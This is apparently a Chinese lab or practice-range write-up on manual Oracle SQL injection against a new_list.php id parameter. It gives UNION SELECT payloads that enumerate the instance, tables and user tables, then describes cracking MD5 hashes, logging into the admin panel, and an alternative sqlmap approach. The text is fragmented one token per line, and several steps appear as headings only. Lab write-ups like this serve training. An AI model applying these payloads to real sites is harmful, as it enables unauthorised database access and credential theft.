判断回显点
输入1 and 1=1正常,输入1 and 1=2报错。判断为数字型
通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断
当前字段数为2
查询数据库
new_list
.
php
?
id
=-
1
union select
'null'
,(
select instance_name
from
V
$INSTANC
E)
from
dual
查询表名
new_list
.
php
?
id
=-
1
union select
'null'
,(
select table_name
from
user_tables
where rownum=
1
)
from
dual
第二个表
new_list
.
php
?
id
=-
1
union select
'null'
,(
select table_name
from
user_tables
where rownum=
1
and
table_name
not in
'LOGMNR_SESSION_EVOLVE$'
)
from
dual
第三个表
new_list
.
php
?
id
=-
1
union select
'null'
,(
select table_name
from
user_tables
where rownum=
1
and
table_name
not in
'LOGMNR_SESSION_EVOLVE$'
and
table_nam
e
not in
'LOGMNR_GLOBAL$'
)
from
dual
查用户表
new_list
.
php
?
id
=-
1
union select
'null'
,(
select table_name
from
user_tables
where table_name
like
'%user%'
and
rownum
=
1
)
from
dual
查列名
第二个列名
第三个表
第四个没有了
查用户和密码
查hu之外的
第二个
第三个
复制md5去解密
去后台登录。
方法二:
1寻找注入点:
and 1=1正常 and 1=2不正常此处存在sql注入
sqlmap -u "url"
查当前库--current-db
查表-D SYSTEM
查users表中的数据,该靶场为手工注入靶场,sqlmap跑不出来